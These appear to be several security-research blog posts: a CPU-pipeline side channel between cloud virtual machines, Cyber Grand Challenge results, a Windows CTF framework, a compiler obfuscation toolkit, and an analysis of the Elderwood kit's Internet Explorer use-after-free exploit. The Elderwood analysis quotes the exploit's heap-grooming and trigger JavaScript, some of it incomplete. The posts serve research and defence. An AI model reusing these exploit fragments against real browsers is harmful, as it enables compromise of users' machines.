Hardware Side Channels in the Cloud

At REcon 2015, I demonstrated a new hardware side channel which targets co-located virtual machines in the cloud. This attack exploits the CPU’s pipeline as opposed to cache tiers which are often used in side channel attacks. When designing or looking for hardware based side channels – specifically in the cloud – I analyzed a few universal properties which define the ‘right’ kind of vulnerable system as well as unique ones tailored to the hardware medium.

Slides and full research paper found here.

The relevance of side channel attacks will only increase. Especially attacks which target the vulnerabilities inherent to systems which share hardware resources – such as in cloud platforms.

Virtualization of Physical Resources

Figure 1: virtualization of physical resources


Any meaningful information that you can leak from the environment running the target application or, in this case, the victim virtual machine counts as a side channel. However, some information is better than others. In this case a process (the attacker) must be able to repeatedly record an environment ‘artifact’ from inside one virtual machine.

In the cloud, these environment artifacts are the shared physical resources used by the virtual machines. The hypervisor dynamically partitions each resource and this is then seen by a single virtual machine as its private resource. The side channel model (Figure 2) illustrates this.

Knowing this, the attacker can affect that resource partition in a recordable way, such as by flushing a line in the cache tier, waiting until the victim process uses it for an operation, then requesting that address again – recording what values are now there.

Figure 2: Side Channel Model

Figure 2: side channel model


Great! So we can record things from our victim’s environment – but now what? Depending on what the victim’s process is doing we can actually employ several different types of attacks.

1. crypto key theft

Crypto keys are great, private crypto keys are even better. Using this hardware side channel, it’s possible to leak the bytes of the private key used by a co-located process. In one scenario, two virtual machines are allocated the same space on the L3 cache at different times. The attacker flushes a certain cache address, waits for the victim to use that address, then queries it again – recording the new values that are there [1].

2. process monitoring ( what applications is the victim running? )

This is possible when you record enough of the target’s behavior, i.e. CPU or pipeline usage or values stored in memory. A mapping between the recording to a specific running process can be constructed with a varied degree of certainty. Warning, this does rely on at least a rudimentary knowledge of machine learning.

3. environment  keying ( great for proving co-location! )

Using the environment recordings taken off of a specific hardware resource, you can also uniquely identify one server from another in the cloud. This is useful to prove that two virtual machines you control are co-resident on the same physical server. Alternatively, if you know the behavior signature of a server your target is on, you can repeatedly create virtual machines, recording the behavior on each system until you find a match [2].

4. broadcast signal ( receive messages without the internet :0 )

If a colluding process is purposefully generating behavior on a pre-arranged hardware resource, such as purposefully filling a cache line with 0’s and 1’s, the attacker (your process) can record this behavior in the same way it would record a victim’s behavior. You then can translate the recorded values into pre-agreed messages. Recording from different hardware mediums results in a channel with different bandwidths [3].

The Cache is Easy, the Pipeline is Harder

Now all of the above examples used the cache to record the environment shared by both victim and attacker processes. Cache is the most widely used in both literature and practice to construct side channels as well as being the easiest to record artifacts from. Basically everyone loves cache.

The cache isn’t the only shared resource: co-located virtual machines also share the CPU execution pipeline. In order to use the CPU pipeline, we must be able to record a value from it. However, there is no easy way for any process to query the state of the pipeline over time – it is like a virtual black-box. The only thing a process can know is the instruction set order it gives to be executed on the pipeline and the result the pipeline returns.

out-of-order execution

( the pipeline’s artifact )

We can exploit this pipeline optimization as a means to record the state of the pipeline. The known input instruction order will result in two different return values – one is the expected result(s), the other is the result if the pipeline executions them out-of-order.

Figure 3: Foreign Processes Can Share the Same Pipeline

Figure 3: foreign processes can share the same pipeline

strong memory ordering

Our target, cloud processors, can be assumed to be x86/64 architecture – implying a usually strongly-ordered memory model [4]. This is important because the pipeline will optimize the execution of instructions but attempt to maintain the right order of stores to memory and loads from memory

…HOWEVER, the stores and loads from different threads may be reordered by out-of-order-execution. Now this reordering is observable if we’re clever.

recording instruction reorder ( or how to be clever )

In order for the attacker to record the “reordering” artifact from the pipeline, we must record two things for each of our two threads:

  • input instruction order
  • return value

Additionally, the instructions in each thread must contain a STORE to memory and a LOAD from memory. The LOAD from memory must reference the location stored to by the opposite thread. This setup ensures the possibility for the four cases illustrated below. The last is the artifact we record – doing so several thousand times gives us averages over time.

Figure 4: the attacker can record when its instructions are reordered

Figure 4: the attacker can record when its instructions are reordered

sending a message

To make our attacks more interesting, we want to be able force the amount of recorded out-of-order-executions. This ability is useful for other attacks, such as constructing covert communication channels.

In order to do this, we need to alter how the pipeline’s optimization works – either by increasing the probability that it will or will not reorder our two threads. The easiest is to enforce a strong memory order and guarantee that the attacker will receive less out-of-order-executions.

memory barriers

In the x86 instruction set, there are specific barrier instructions that will stop the processor from reordering the four possible combinations of STORE’s and LOAD’s. What we’re interested in is forcing a strong order when the processor encounters an instruction set with a STORE followed by a LOAD.

The instruction mfence does exactly this.

By have the colluding process inject these memory barriers in the pipeline, the attacker’s instructions will not be reordered, forcing a noticeable decrease in the recorded averages. Doing this in distinct time frames allows us to send a binary message.

Figure 5: mfence ensures the strong memory order on pipeline

Figure 5: mfence ensures the strong memory order on pipeline


The takeaway is that even with virtualization separating your virtual machine from the hundreds of other alien virtual machines, the pipeline can’t distinguish your process’s instructions from all the other ones and we can use that to our advantage. :0

If you would like to learn more about this side channel technique, please read the full paper here.

  1. https://eprint.iacr.org/2013/448.pdf
  2. http://www.ieee-security.org/TC/SP2011/PAPERS/2011/paper020.pdf
  3. https://www.cs.unc.edu/~reiter/papers/2014/CCS1.pdf
  4. http://preshing.com/20120930/weak-vs-strong-memory-models/

How We Fared in the Cyber Grand Challenge

The Cyber Grand Challenge qualifying event was held on June 3rd, at exactly noon Eastern time. At that instant, our Cyber Reasoning System (CRS) was given 131 purposely built insecure programs. During the following 24 hour period, our CRS was able to identify vulnerabilities in 65 of those programs and rewrite 94 of them to eliminate bugs built in their code. This proves, without a doubt, that it is not only possible but achievable to automate the actions of a talented software auditor.

Despite the success of our CRS at finding and patching vulnerabilities, we did not qualify for the final event, to be held next year. There was a fatal flaw that lowered our overall score to 9th, below the 7th place threshold for qualification. In this blog post we’ll discuss how our CRS works, how it performed against competitor systems, what doomed its score, and what we are going to do next.

Cyber Grand Challenge Background

The goal of the Cyber Grand Challenge (CGC) is to combine the speed and scale of automation with the reasoning capabilities of human experts. Multiple teams create Cyber Reasoning Systems (CRSs) that autonomously reason about arbitrary networked programs, prove the existence of flaws in those programs, and automatically formulate effective defenses against those flaws. How well these systems work is evaluated through head-to-head tournament-style competition.

The competition has two main events: the qualifying event and the final event. The qualifying event was held on June 3, 2015. The final event is set to take place during August 2016. Only the top 7 competitors from the qualifying event proceed to the final event.

During the qualifying event, each competitor was given the same 131 challenges, or purposely built vulnerable programs, each of which contained at least one intentional vulnerability. For 24 hours, the competing CRSes faced off against each other and were scored according to four criteria. The full details are in the CGC Rules, but here’s a quick summary:

  • The CRS had to work without human intervention. Any teams found to use human assistance were disqualified.
  • The CRS had to patch bugs in challenges. Points were gained for every bug successfully patched. Challenges with no patched bugs received zero points.
  • The CRS could prove bugs exist in challenges. The points from patched challenges were doubled if the CRS could generate an input that crashed the challenge.
  • The patched challenges had to function and perform almost as well as the originals. Points were lost based on performance and functionality loss in the patched challenges.

A spreadsheet with all the qualifying event scores and other data used to make the graphs in this post is available from DARPA (Trail of Bits is the ninth place team). With the scoring in mind, let’s review the Trail of Bits CRS architecture and the design decisions we made.


We’re a small company with a distributed workforce, so we couldn’t physically host a lot of servers. Naturally, we went with cloud computing to do processing; specifically, Amazon EC2. Those who saw our tweets know we used a lot of EC2 time. Most of that usage was purely out of caution.

We didn’t know how many challenges would be in the qualifying event — just that it would be “more than 100.” We prepared for a thousand, with each accompanied by multi-gigabyte network traffic captures. We were also terrified of an EC2 region-wide failure, so we provisioned three different CRS instances, one in each US-based EC2 region, affectionately named Biggie (us-east-1), Tupac (us-west-2), and Dre (us-west-1).

It turns out that there were only 131 challenges and no gigantic network captures in the qualifying event. During the qualifying event, all EC2 regions worked normally. We could have comfortably done the qualifying event with 17 c4.8xlarge EC2 instances, but instead we used 297. Out of our abundance of caution, we over-provisioned by a factor of ~17x.

Bug Finding

The Trail of Bits CRS was ranked second by the number of verified bugs found (Figure 1). This result is impressive considering that we started with nothing while several other teams already had existing bug finding systems prior to CGC.

Figure 1: Teams in the qualifying event ranked by number of bugs found. Orange bars signify finalists.

Our CRS used a multi-pronged strategy to find bugs (Figure 2). First, there was fuzzing. Our fuzzer is implemented with a custom dynamic binary translator (DBT) capable of running several 32-bit challenges in a single 64-bit address space. This is ideal for challenges that feature multiple binaries communicating with one another. The fuzzer’s instrumentation and mutation are separated, allowing for pluggable mutation strategies. The DBT framework can also snapshot binaries at any point during execution. This greatly improves fuzzing speed, since it’s possible to avoid replaying previous inputs when exploring new input space.

Figure 2: Our bug finding architecture. It is a feedback-based architecture that explores the state space of a program using fuzzing and symbolic execution.

Figure 2: Our bug finding architecture. It is a feedback-based architecture that explores the state space of a program using fuzzing and symbolic execution.

In addition to fuzzing, we had not one but two symbolic execution engines. The first operated on the original unmodified binaries, and the second operated on the translated LLVM from mcsema. Each symbolic execution engine had its own strengths, and both contributed to bug finding.

The fuzzer and symbolic execution engines operate in a feedback loop mediated by a system we call MinSet. The MinSet uses branch coverage to maintain a minimum set of maximal coverage inputs. The inputs come from any source capable of generating them: PCAPs, fuzzing, symbolic execution, etc. Every tool gets original inputs from MinSet, and feeds any newly generated inputs into MinSet. This feedback loop lets us explore the possible input state with both fuzzers and symbolic execution in parallel. In practice this is very effective. We log the provenance of our crashes, and most of them look something like:

Network Capture ⇒ Fuzzer ⇒ SymEx1 ⇒ Fuzzer ⇒ Crash

Some bugs can only be triggered when the input replays a previous nonce, which would be different on every execution of the challenge. Our bug finding system can produce inputs that contain variables based on program outputs, enabling our CRS to handle such cases.

Additionally, our symbolic executors are able to identify which inputs affect program state at the point of a crash. This is a key requirement for the success of any team competing in the final as it enables the CRS to create a more controlled crash.


Our CRS’s patching effectiveness, as measured by the security score, ranks as fourth (Figure 3).

Figure 3: Teams in the qualifying event ranked by patch effectiveness (security score). Orange bars signify finalists.

Figure 3: Teams in the qualifying event ranked by patch effectiveness (security score). Orange bars signify finalists.

Our CRS patches bugs by translating challenges into LLVM bitcode with mcsema. Patches are applied to the LLVM bitcode, optimized, and then converted back into executable code. The actual patching works by gracefully terminating the challenge when invalid memory accesses are detected. Patching the LLVM bitcode representation of challenges provides us with enormous power and flexibility:

  • We can easily validate any memory access and keep track of all memory allocations.
  • Complex algorithms, such as dataflow tracking, dominator trees, dead store elimination, loop detection, etc., are very simple to implement using the LLVM compiler infrastructure.
  • Our patching method can be used on real-world software, not just CGC challenges.

We created two main patching strategies: generic patching and bug-based patching. Generic patching is an exclusion-based strategy: it first assumes that every memory access must be verified, and then excludes accesses that are provably safe. The benefit of generic patching is that it patches all possible invalid memory accesses in a challenge. Bug-based patching is an inclusion-based strategy: it first assumes only one memory access (where the CRS found a bug) must be verified, and then includes nearby accesses that may be unsafe. Each patching strategy has multiple heuristics to determine which accesses should be included or excluded from verification.

The inclusion and exclusion heuristics generate patched challenges with different security/performance tradeoffs. The patched challenges generated by these heuristics were tested for performance and security to determine which heuristic performed best while still fixing the bug. For the qualifying event, we evaluated both generic and bug-based patching, but ultimately chose a generic-only patching strategy. Bug-based patching was slightly more performant, but generic patching was more comprehensive and it patched bugs that our CRS couldn’t find.

Functionality and Performance

Functionality and performance scores combine to create an availability score. The availability score is used as a scaling factor for points gained by patching and bug finding. This scaling factor only matters for successfully patched challenges, since those are the only challenges that can score points. The following graphs only consider functionality and performance of successfully patched challenges.


Out of the 94 challenges that our CRS successfully patched, 56 retained full functionality, 30 retained partial functionality, and 8 were nonfunctional. Of the top 10 teams in the qualifying event, our CRS ranks 5th in terms of fully functional patched challenges (Figure 4). We suspect our patched challenges lost functionality due to problems in mcsema, our x86 to LLVM translator. We hope to verify and address these issues once DARPA open-sources the qualifying event challenges.

Figure 4: The count of perfectly functional, partially functional, and nonfunctional challenges submitted by each of the top 10 teams in the qualifying event. Orange bars signify finalists.

Figure 4: The count of perfectly functional, partially functional, and nonfunctional challenges submitted by each of the top 10 teams in the qualifying event. Orange bars signify finalists.


The performance of patched challenges is how our CRS snatched defeat from the jaws of victory. Of the top ten teams in the qualifying event, our CRS placed last in terms of patched challenge performance (Figure 5).

Figure 5: Average and median performance scores of the top ten qualifying event participants. Orange bars signify finalists.

Figure 5: Average and median performance scores of the top ten qualifying event participants. Orange bars signify finalists.

Our CRS produces slow binaries for two reasons: technical and operational. The technical reason is that performance of our patched challenges is an artifact of our patching process, which translates challenges into LLVM bitcode and then re-emits them as executable binaries. The operational reason is that our patching was developed late and optimized for the wrong performance measurements.

So, why did we optimize for the wrong performance measurements? The official CGC performance measurement tools were kept secret, because the organizers wanted to ensure that no one could cheat by gaming the performance measurements. Therefore, we had to measure performance ourselves, and our metrics showed that CPU overhead of our patched challenges was usually negligible. The main flaw that we observed was that our patched challenges used too much memory. Because of this, we spent time and effort optimizing our patching to use less memory in favor of using more CPU time.

It turns out we optimized for the wrong thing, because our self-measurement did not agree with the official measurement tools (Table 1). When self-measuring, our worst-performing patching method had a median CPU overhead of 33% and a median memory overhead of 69%. The official qualifying event measured us at 76% CPU overhead and 28% memory overhead. Clearly, our self-measurements were considerably different from official measurements.

Measurement Median CPU Overhead Median Memory Overhead
Worst Self-Measured Patching Method 33% 69%
Official Qualifying Event 76% 28%

Table 1: Self measured CPU and memory overhead and the official qualifying event CPU and memory overhead.

Our CRS measured its overall score with our own performance metrics. The self-measured score of our CRS was 106, which would have put us in second place. The real overall score was 21.36, putting us in ninth.

An important aspect of software development is choosing where to focus your efforts, and we chose poorly. CGC participants had access to the official measuring system during two scored events held during the year, one in December 2014 and one in April 2015. We should have evaluated our patching system thoroughly during both scored events. Unfortunately, our patching wasn’t fully operational until after the second scored event, so we had no way to verify the accuracy of our self-measurement. The performance penalty of our patching isn’t a fundamental issue. Had we known how bad it was, we would have fixed it. However, according to our own measurements the patching was acceptable so we focused efforts elsewhere.

What’s Next?

According to the CGC FAQ (Question 46), teams are allowed to combine after the qualifying event. We hope to join forces with another team that qualified for the CGC final event, and use the best of both our technologies to win. The technology behind our CRS will provide a significant advantage to any team that partners with us. If you would like to discuss a potential partnership for the CGC final, please contact us at cgc@trailofbits.com.

If we cannot find a partner for the CGC final, we will focus our efforts on adapting our CRS to automatically find and patch vulnerabilities in real software. Our system is up to the task: it has already proven that it can find bugs, and all of its core components were derived from software that works on real Linux binaries. Several components even have Windows and 64-bit support, and adding support for other platforms is a possibility. If you are interested in commercial applications of our technology, please get in touch with us at cgc@trailofbits.com.

Finally, we plan to contribute back fixes and updates to the open source projects utilized in our CRS. We used numerous open source projects during development, and have made several custom fixes and modifications. We look forward to contributing these back to the community so that everyone benefits from our improvements.

Closing the Windows Gap

The security research community is full of grey beards that earned their stripes writing exploits against mail servers, domain controllers, and TCP/IP stacks. These researchers started writing exploits on platforms like Solaris, IRIX, and BSDi before moving on to Windows exploitation. Now they run companies, write policy, rant on twitter, and testify in front of congress. I’m not one of those people; my education in security started after Windows Vista and then expanded through Capture the Flag competitions when real-world research got harder. Security researchers entering the industry post-20101 learn almost exclusively via Capture the Flags competitions.

Occasionally, I’ll try to talk a grey beard into playing capture the flag. It’s like trying to explain Pokemon to adults. Normally such endeavors are an exercise in futility; however, on a rare occasion they’ll also get excited and agree to try it out! They then get frustrated and stuck on the same problems I do – it’s fantastic for my ego2.

“Ugh, it’s 90s shellcoding problems applied today.”
— muttered during DEFCON 22 CTF Quals

Following a particularly frustrating CTF we were discussing challenges and how there are very few Windows challenges despite Windows being such an important part of our industry. Only the Russian CTFs release Windows challenges; none of the large American CTFs do.

Much like Cold War-era politics, the Russian (CTFs) have edged out a Windows superiority, a Windows gap.

Projected magnitude of the Windows gap

Projected magnitude of the Windows gap

The Windows gap exists outside of CTF as well. Over the past few years the best Windows security research has come out of Russia3 and China. So, why are the Russians and Chinese so good at Windows? Well, because they actually use Windows…and for some reason western security researchers don’t.

Let’s close this Windows gap. Windows knowledge is important for our industry.

Helping the CTF community

If Capture the Flag competitions are how today’s greenhorns cut their teeth, we should have more Windows-based challenges and competitions. To facilitate this, Trail of Bits is releasing AppJailLauncher, a framework for making exploitable Windows challenges!

This man knows Windows and thinks you should too.

This man knows Windows and thinks you should too.

As a contest organizer, securing your infrastructure is the biggest priority and securing Windows services has always been a bit tricky until Windows 8 and the introduction of AppContainers. AppJailLauncher uses AppContainers to keep everything nice and secure from griefers. The repository includes everything you need to isolate a Windows TCP service from the rest of the operating system.

Additionally, we’re releasing the source code to greenhornd, a 2014 CSAW challenge I wrote to introduce people to Windows exploitation and the best debugger yet developed: WinDbg. The repository includes the binary as released, deployment directions, and a proof-of-vulnerability script.

We’re hoping to help drag the CTF community kicking and screaming into Windows expertise.

Windows Reactions

Releasing a Windows challenge last year at CSAW was very entertaining. There was plenty of complaining4:

<dwn> how is this windows challenge only 200 points omg
<dwn> making the vuln obvious doesn’t make windows exploitation any easier ;_;

<mserrano> RyanWithZombies: dude but its fuckin windows
<mserrano> even I don’t use windows anymore
<@RyanWithZombies> i warned you guys for months
<mserrano> also man windows too hard

<geohot> omg windows
<geohot> is so hard
<geohot> will do tomorrow
<geohot> i don’t have windows vm

<ebeip90> zomg a windows challenge
<ebeip90> <3
[ hours later ]
<ebeip90> remember that part a long time ago when I said “Oh yay, a Windows challenge”?

<ricky> Windows is hard
<miton> ^

Some praise:

<cai_> i liked your windows one btw :)

<MMavipc> RyanWithZombies pls more windows pwning/rce

<CTFBroforce> I was so confused I have never done a windows exploit
<CTFBroforce> this challenge is going to make me look into windows exploits
<CTFBroforce> I dont know how to write windows shell code

<spq> thx for the help and the force to exploit windows with shellcode for the first time :)

It even caused some arguments among competitors:

<clockish> dudes, shut up, windows is hard
<MMavipc> windows is easy
<MMavipc> linux is hard

We hope AppJailLauncher will be used to elicit more passionate responses over the next few years!

  1. Many of the most popular CTFs started in 2010 and 2011: Ghost in the Shellcode (2010), RuCTFe (2010), PlaidCTF (2011), Codegate (2011), PHDays (2011). Very few predate 2010.
  2. Much like watching geohot fail at format string exploitation during a LiveCTF broadcast: https://www.youtube.com/watch?v=td1KEUhlSuk
  3. Try searching for obscure Windows kernel symbols, you’ll end up on a Russian forum.
  4. The names have not been changed to shame the enablers.

ReMASTering Applications by Obfuscating during Compilation

In this post, we discuss the creation of a novel software obfuscation toolkit, MAST, implemented in the LLVM compiler and suitable for denying program understanding to even the most well-resourced adversary. Our implementation is inspired by effective obfuscation techniques used by nation-state malware and techniques discussed in academic literature. MAST enables software developers to protect applications with technology developed for offense.

MAST is a product of Cyber Fast Track, and we would like to thank Mudge and DARPA for funding our work. This project would not have been possible without their support. MAST is now a commercial product offering of Trail of Bits and companies interested in licensing it for their own use should contact info@trailofbits.com.


There are a lot of risks in releasing software these days. Once upon a time, reverse engineering software presented a challenge best solved by experienced and skilled reverse engineers at great expense. It was worthwhile for reasonably well-funded groups to reverse engineer and recreate proprietary technology or for clever but bored people to generate party tricks. Despite the latter type of people causing all kinds of mild internet havoc, reverse engineering wasn’t widely considered a serious threat until relatively recently.

Over time, however, the stakes have risen; criminal entities, corporations, even nation-states have become extremely interested in software vulnerabilities. These entities seek to either defend their own network, applications, users, or to attack someone else’s. Historically, software obfuscation was a concern of the “good guys”, who were interested in protecting their intellectual property. It wasn’t long before malicious entities began obfuscating their own tools to protect captured tools from analysis.

A recent example of successful obfuscation is that used by the authors of the Gauss malware; several days after discovering the malware, Kaspersky Lab, a respected malware analysis lab and antivirus company, posted a public plea for assistance in decrypting a portion of the code. That even a company of professionals had trouble enough to ask for outside help is telling: obfuscation can be very effective. Professional researchers have been unable to deobfuscate Gauss to this day.


With all of this in mind, we were inspired by Gauss to create a software protection system that leapfrogs available analysis technology. Could we repurpose techniques from software exploitation and malware obfuscation into a state-of-the-art software protection system? Our team is quite familiar with publicly available tools for assisting in reverse engineering tasks and considered how to significantly reduce their efficacy, if not deny it altogether.

Software developers seek to protect varying classes of information within a program. Our system must account for each with equal levels of protection to satisfy these potential use cases:

  • Algorithms: adversary knowledge of proprietary technology
  • Data: knowledge of proprietary data (the company’s or the user’s)
  • Vulnerabilities: knowledge of vulnerabilities within the program

In order for the software protection system to be useful to developers, it must be:

  • Easy to use: the obfuscation should be transparent to our development process, not alter or interfere with it. No annotations should be necessary, though we may want them in certain cases.
  • Cross-platform: the obfuscation should apply uniformly to all applications and frameworks that we use, including mobile or embedded devices that may run on different processor architectures.
  • Protect against state-of-the-art analysis: our obfuscation should leapfrog available static analysis tools and techniques and require novel research advances to see through.

Finally, we assume an attacker will have access to the static program image; many software applications are going to be directly accessible to a dedicated attacker. For example, an attacker interested in a mobile application, anti-virus signatures, or software patches will have the static program image to study.

Our Approach

We decided to focus primarily on preventing static analysis; in this day and age there are a lot of tools that can be run statically over application binaries to gain information with less work and time required by attackers, and many attackers are proficient in generating their own situation-specific tools. Static tools can often very quickly be run over large amounts of code, without necessitating the attacker having an environment in which to execute the target binary.

We decided on a group of techniques that compose together, comprising opaque predicate insertion, code diffusion, and – because our original scope was iOS applications – mangling of Objective-C symbols. These make the protected application impossible to understand without environmental data, impossible to analyze with current static analysis tools due to alias analysis limitations, and deny the effectiveness of breakpoints, method name retrieval scripts, and other common reversing techniques. In combination, these techniques attack a reverse engineer’s workflow and tools from all sides.

Further, we did all of our obfuscation work inside of a compiler (LLVM) because we wanted our technology to be thoroughly baked into the entire program. LLVM can use knowledge of the program to generate realistic opaque predicates or hide diffused code inside of false paths not taken, forcing a reverse engineer to consult the program’s environment (which might not be available) to resolve which instruction sequences are the correct ones. Obfuscating at the compiler level is more reliable than operating on an existing binary: there is no confusion about code vs. data or missing critical application behavior. Additionally, compiler-level obfuscation is transparent to current and future development tools based on LLVM. For instance, MAST could obfuscate Swift on the day of release — directly from the Xcode IDE.

Symbol Mangling

The first and simplest technique was to hinder quick Objective-C method name retrieval scripts; this is certainly the least interesting of the transforms, but would remove a large amount of human-readable information from an iOS application. Without method or other symbol names present for the proprietary code, it’s more difficult to make sense of the program at a glance.

Opaque Predicate Insertion

The second technique we applied, opaque predicate insertion, is not a new technique. It’s been done before in numerous ways, and capable analysts have developed ways around many of the common implementations. We created a stronger version of predicate insertion by inserting predicates with opaque conditions and alternate branches that look realistic to a script or person skimming the code. Realistic predicates significantly slow down a human analyst, and will also slow down tools that operate on program control flow graphs (CFGs) by ballooning the graph to be much larger than the original. Increased CFG size impacts the size of the program and the execution speed but our testing indicates the impact is smaller or consistent with similar tools.

Code Diffusion

The third technique, code diffusion, is by far the most interesting. We took the ideas of Return-Oriented Programming (ROP) and applied them in a defensive manner.

In a straightforward situation, an attacker exploits a vulnerability in an application and supplies their own code for the target to execute (shellcode). However, since the introduction of non-executable data mitigations like DEP and NX, attackers have had to find ways to execute malicious code without the introduction of anything new. ROP is a technique that makes use of code that is already present in the application. Usually, an attacker would compile a set of short “gadgets” in the existing program text that each perform a simple task, and then link those together, jumping from one to the other, to build up the functionality they require for their exploit — effectively creating a new program by jumping around in the existing program.

We transform application code such that it jumps around in a ROP-like way, scrambling the program’s control flow graph into disparate units. However, unlike ROP, where attackers are limited by the gadgets they can find and their ability to predict their location at runtime, we precisely control the placement of gadgets during compilation. For example, we can store gadgets in the bogus programs inserted during the opaque predicate obfuscation. After applying this technique, reverse engineers will immediately notice that the handy graph is gone from tools like IDA. Further, this transformation will make it impossible to use state-of-the-art static analysis tools, like BAP, and impedes dynamic analysis techniques that rely on concrete execution with a debugger. Code diffusion destroys the semantic value of breakpoints, because a single code snippet may be re-used by many different functions and not used by other instances of the same function.

graph view is useful

Native code before obfuscation with MAST

graph view is useless

Native code after obfuscation with MAST

The figures above demonstrate a very simple function before and after the code diffusion transform, using screenshots from IDA. In the first figure, there is a complete control flow graph; in the second, however, the first basic block no longer jumps directly to either of the following blocks; instead, it must refer at runtime to a data section elsewhere in the application before it knows where to jump in either case. Running this code diffusion transform over an entire application reduces the entire program from a set of connected-graph functions to a much larger set of single-basic-block “functions.”

Code diffusion has a noticeable performance impact on whole-program obfuscation. In our testing, we compared the speed of bzip2 before and after our return-oriented transformation and slowdown was approximately 55% (on x86).

Environmental Keying

MAST does one more thing to make reverse engineering even more difficult — it ties the execution of the code to a specific device, such as a user’s mobile phone. While using device-specific characteristics to bind a binary to a device is not new (it is extensively used in DRM and some malware, such as Gauss), MAST is able to integrate device-checking into each obfuscation layer as it is woven through the application. The intertwining of environmental keying and obfuscation renders the program far more resistant to reverse-engineering than some of the more common approaches to device-binding.

Rather than acquiring any copy of the application, an attacker must also acquire and analyze the execution environment of the target computer as well. The whole environment is typically far more challenging to get ahold of, and has a much larger quantity of code to analyze. Even if the environment is captured and time is taken to reverse engineer application details, the results will not be useful against the same application as running on other hosts because every host runs its own keyed version of the binary.


In summary, MAST is a suite of compile-time transformations that provide easy-to-use, cross-platform, state-of-the-art software obfuscation. It can be used for a number of purposes, such as preventing attackers from reverse engineering security-related software patches; protecting your proprietary technology; protecting data within an application; and protecting your application from vulnerability hunters. While originally scoped for iOS applications, the technologies are applicable to any software that can be compiled with LLVM.

Dear DARPA: Challenge Accepted.


We are proud to have one of the only seven accepted funded-track proposals to DARPA’s Cyber Grand Challenge.

Computer security experts from academia, industry and the larger security community have organized themselves into more than 30 teams to compete in DARPA’s Cyber Grand Challenge —- a first-of-its-kind tournament designed to speed the development of automated security systems able to defend against cyberattacks as fast as they are launched. DARPA also announced today that it has reached an agreement to hold the 2016 Cyber Grand Challenge final competition in conjunction with DEF CON, one of the largest computer security conferences in the world.

More info from DARPA:

Press coverage:

Our participation in this program aligns with our development of Javelin, an automated system for simulating attacks against enterprise networks. We have assembled a world-class team of experts in software security, capture the flag, and program analysis to compete in this challenge. As much as we wish the other teams luck in this competition, Trail of Bits is playing to win. Game on!

Introducing Javelin


Javelin shows you how modern attackers would approach and exploit your enterprise. By simulating real-time, real-world attack techniques, Javelin identifies which employees are most likely to be targets of spearphishing campaigns, uncovers security infrastructure weaknesses, and compares overall vulnerability against industry competitors. Javelin benchmarks the efficacy of defensive strategies, and provides customized recommendations for improving security and accelerating threat detection. Highly automated, low touch, and designed for easy adoption, Javelin will harden your existing security and information technology infrastructure.

Read more about Javelin on the Javelin Blog.

Writing Exploits with the Elderwood Kit (Part 2)

In the third part of our five-part series, we investigate the how the toolkit user gained control of program flow and what their strategy means for the reliability of their exploit.

Last time, we talked about how the Elderwood kit does almost everything for the kit user except give them a vulnerability to use. We think it is up to the user to discover a vulnerability, trigger and exploit it, then integrate it with the kit. Our analysis indicates that their knowledge of how to do this is poor and the reliability of the exploit suffered as a result. In the sections that follow, we walk through each section of the exploit that the user had to write on their own.

The Document Object Model (DOM)

The HTML Document Object Model (DOM) is a representation of an HTML page, used for accessing and modifying properties. Browsers provide an interface to the DOM via JavaScript. This interface allows websites to have interactive and dynamically generated content. This interface is very complicated and is subject to many security flaws such as the use-after-free vulnerability used by the attackers in the CFR compromise. For example, the Elderwood group has been responsible for discovering and exploiting at least three prior vulnerabilities of this type in Internet Explorer.

Use-after-Free Vulnerabilities

Use-after-free vulnerabilities occur when a program frees a block and then attempts to use it at some later point in program execution. If, before the block is reused, an attacker is able to allocate new data in its place then they can gain control of program flow.

Exploiting a Use-after-Free

  1. Program allocates and then later frees block A
  2. Attacker allocates block B, reusing the memory previously allocated to block A
  3. Attacker writes data into block B
  4. Program uses freed block A, accessing the data the attacker left there

In order to take advantage of CVE-2012-4792, the exploit allocated and freed a CButton object. While a weak reference to the freed object was maintained elsewhere in Internet Explorer, the exploit overwrote the CButton object with their own data. The exploit then triggered a virtual function call on the CButton object, using the weak reference, resulting in control of program execution.

Prepare the Heap

After 16 allocations of the same size occur, Internet Explorer will switch to using the Low Fragmentation Heap (LFH) for further heap allocations. Since these allocations exist on a different heap, they are not usable for exploitation and have to be ignored. To safely skip over the first 16 allocations, the exploit author creates 3000 string allocations of a similar size to the CButton object by assigning the className property on a div tag.

var arrObject = new Array(3000);
var elmObject = new Array(500);
for (var i = 0; i < arrObject.length; i++) {
	arrObject[i] = document.createElement('div');
	arrObject[i].className = unescape("ababababababababababababababababababababa");

The contents of the chosen string, repeated “ab”s,  is not important. What is important is the size of the allocation created by it. The LFH has an 8 byte granularity for allocations less than 256 bytes so allocations between 80 and 88 bytes will be allocated from the same area. Here is an example memory dump of what the string in memory would look like:

00227af8  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b08  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b18  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b28  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b38  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b48  61 00 00 00 00 00 00 00-0a 7e a8 ea 00 01 08 ff  a........~......

Then, the exploit author assigns the className of every other div tag to null, thereby freeing the previously created strings when CollectGarbage() is called. This will create holes in the allocated heap memory and creates a predictable pattern of allocations.

for (var i = 0; i < arrObject.length; i += 2) {
	arrObject[i].className = null;

Next, the author creates 500 button elements. As before, they free every other one to create holes and call CollectGarbage() to enable reuse of the allocations.

for (var i = 0; i < elmObject.length; i++) {
	elmObject[i] = document.createElement('button');
for (var i = 1; i < arrObject.length; i += 2) {
	arrObject[i].className = null;

In one of many examples of reused code in the exploit, the JavaScript array used for heap manipulation is called arrObject. This happens to be the variable name given to an example of how to create arrays found on page 70 of the JavaScript Cookbook.

Trigger the Vulnerability

The code below is responsible for creating the use-after-free condition. The applyElement and appendChild calls create the right conditions and new allocations. The free will occur after setting the outerText property on the q tag and then calling CollectGarbage().

try {
	e0 = document.getElementById("a");
	e1 = document.getElementById("b");
	e2 = document.createElement("q");
	e2.outerText = "";
} catch (e) {}

At this point, there is now a pointer to memory that has been freed (a stale pointer). In order to continue with the exploit, the memory it points to must be replaced with attacker-controlled data and then the pointer must be used.

